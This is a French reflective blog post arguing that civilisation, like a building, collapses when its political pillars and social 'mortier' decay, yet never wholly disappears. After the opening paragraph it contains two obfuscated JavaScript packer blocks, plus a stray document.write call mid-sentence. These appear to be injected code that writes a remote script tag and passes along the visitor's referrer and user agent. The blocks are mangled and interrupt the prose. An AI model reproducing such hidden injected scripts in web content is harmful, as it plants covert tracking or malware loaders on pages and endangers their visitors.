Réflexion aléatoire #014058

Qu’est-ce qui fait qu’un bâtiment s’écroule? Un bâtiment tombe en ruines lorsque les piliers qui le soutiennent rouillent ou pourrissent et lorsque le mortier qui lie ses pierres se désagrège…
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sttht|var|u0026u|referrer|drdtr||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nrkfd|var|u0026u|referrer|dstte||js|php’.split(‘|’),0,{}))

Ce bâtiment c’est notre civilisation, document.write(“”); notre société. Les piliers en sont le système politique qui nous dirige (quel que soit sa nature: théocratique, monarchique, ou démocratique), là où les décisions se prennent, où la gestion se fait. Le mortier, c’est nos lois et nos conventions sociales. Ce
contrat social qui nous lie tous l’un à l’autre dans un seul but, un objectif commun, une survie commune. Celui-ci est de maintenir et de faire progresser tant le bien-être des individus qui forment la collectivité, que de celui de l’ensemble de la société, de la civilisation en tant qu’entité holistique. Comme disait Tolstoï, “Les hommes sont des rouages qui servent à bâtir l’Histoire.”

Mais qu’arrive-t-il quand nos piliers sont corrompu? Quand l’individualisme et le je-m’en-foutisme à outrance, l’insolence et le manque de respect pour l’autre, pour les biens de l’autre, pour la société en général, l’ignorance, quand cet affront généralisé contre la collectivité lentement effrite le mortier qui lie l’ensemble? Alors la structure n’a plus de support, le toit protecteur s’effondre, les murs de nos conventions s’écroulent et la société devient dysfonctionnelle…

Tel est le triste constat que l’on doit faire sur l’état de notre civilisation. Elle semble bientôt destinée à disparaître…

Mais, bon, les babyloniens, les égyptiens, les grecs et les romains ont tous fait ce même constat avant nous, à un moment ou à un autre. Leurs civilisations ont certes disparu mais jamais totalement. Elle se sont transformées, ont été absorbées, pour devenir l’étape suivante de l’Humanité. Alors, peut-être, tout n’est-il pas perdu?

[ Translate ]